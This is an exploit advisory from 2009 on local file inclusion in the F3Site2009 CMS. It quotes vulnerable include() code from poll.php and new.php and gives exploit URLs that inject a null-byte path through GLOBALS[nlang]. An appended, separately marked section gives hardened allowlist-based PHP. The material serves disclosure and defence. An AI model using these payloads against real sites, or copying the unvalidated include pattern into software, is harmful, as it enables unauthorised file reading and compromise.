# Title : F3Site2009 Multiple LFI Exploit
# Published : 2009-12-18
# Author : cr4wl3r
##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit ##
## Date: 18-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://code.google.com/p/f3site/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code [poll.php] :
// nlang reaches include() unvalidated; the request below sets it via GLOBALS[nlang]
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
    include('./cache/poll_'.$GLOBALS['nlang'].'.php');
endif;
~ 3xplo!t :
[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]
~ Code [new.php] :
// Same pattern as poll.php: nlang is concatenated into the include path unvalidated
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
    include './cache/new-'.$GLOBALS['nlang'].'.php';
}
~ 3xplo!t :
[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]
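
~ Hardened form (added example, not part of the original advisory and not F3Site code) :
Both include sites above build the cache path from `nlang` without validation. The sketch below only builds the path from an allowlisted language code and rejects requests that carry a `GLOBALS` parameter. The helper name `cache_file` and the `ALLOWED_LANGS` values are assumptions.

```php
<?php
// Added example (hypothetical helper, not F3Site code).
// Assumption: the installed language codes are known in advance.
const ALLOWED_LANGS = ['en', 'pl'];

// Return the absolute path of ./cache/<prefix><lang>.php, or null if the
// language code is not an exact allowlist entry or the file is not in the cache dir.
function cache_file(string $prefix, $lang, string $cacheDir = './cache'): ?string
{
    // A strict allowlist match rejects arrays, "../" sequences and NUL bytes alike.
    if (!is_string($lang) || !in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }
    $base = realpath($cacheDir);
    $real = realpath($cacheDir . '/' . $prefix . $lang . '.php');
    // Defence in depth: the resolved file must sit directly inside the cache dir.
    if ($base === false || $real === false || dirname($real) !== $base) {
        return null;
    }
    return $real;
}

// Refuse requests that try to set GLOBALS through request parameters.
foreach ([$_GET, $_POST, $_COOKIE] as $input) {
    if (array_key_exists('GLOBALS', $input)) {
        http_response_code(400);
        exit('Bad request');
    }
}

// Replacement for the include in mod/poll.php; mod/new.php uses prefix 'new-'.
$file = cache_file('poll_', $GLOBALS['nlang'] ?? null);
if ($file !== null) {
    include $file;
}
```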